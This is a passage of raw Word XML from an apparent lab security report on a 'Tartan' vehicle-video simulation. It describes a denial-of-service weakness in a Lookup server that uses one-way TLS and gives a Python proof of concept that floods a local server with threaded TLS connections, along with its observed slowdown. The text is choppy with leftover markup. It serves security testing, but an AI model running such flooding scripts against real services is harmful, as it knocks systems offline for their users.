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Vulnerability 4. </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Denial of Service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When making a TLS connection with the Lookup server, only the server is authenticated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, not mutual authentication, so if there is only RootCA, an attacker can access the Lookup server using a</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> DoS attack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PoC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2.1 Trigger point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(Start message transmit and receive time * 80) &lt; recent message transmit and receive time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print “OH !!!” message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2.2 Scenario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the local environment, We start the Tartan tool and start the video mode simulation. First capture the car is normal situation which is fast(fps=30.32).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826384" cy="224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384" cy="224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start the DDos attack and the video starts to slow down(fps = 20).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792662" cy="2082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662" cy="208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then client become a trigger point and prints “OH message” and stop.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Attacker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ssl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HOST = 'localhost'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PORT = 2222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context = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)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context.load_verify_locations('rootca.crt')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#context.load_verify_locations('serverCrt.pem')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context.check_hostname =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pn = "LKY1360"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getHtml():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with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as sock: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#with context.wrap_socket(sock, server_hostname='pylib') as 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with context.wrap_socket(sock, server_hostname='2Team') as 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s.connect((HOST, PORT))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# time.sleep(1)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sendMsgHdr=(len(pn)+1)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sendMsgHdr2=sendMsgHdr.to_bytes(2, 'big')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s.sendall(sendMsgHdr2)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#print('Data : {} , Data Length : {}'.format(pn, sendMsgHdr2))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s.sendall(pn.encode('utf-8'))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n_threads = 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Splitting the items into chunks equal to number of threads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thread_list = []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thr in range(n_threads):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thread = threading.Thread(target=getHtml)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thread_list.append(thread)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thread_list[thr].start()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thread in thread_list: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thread.join()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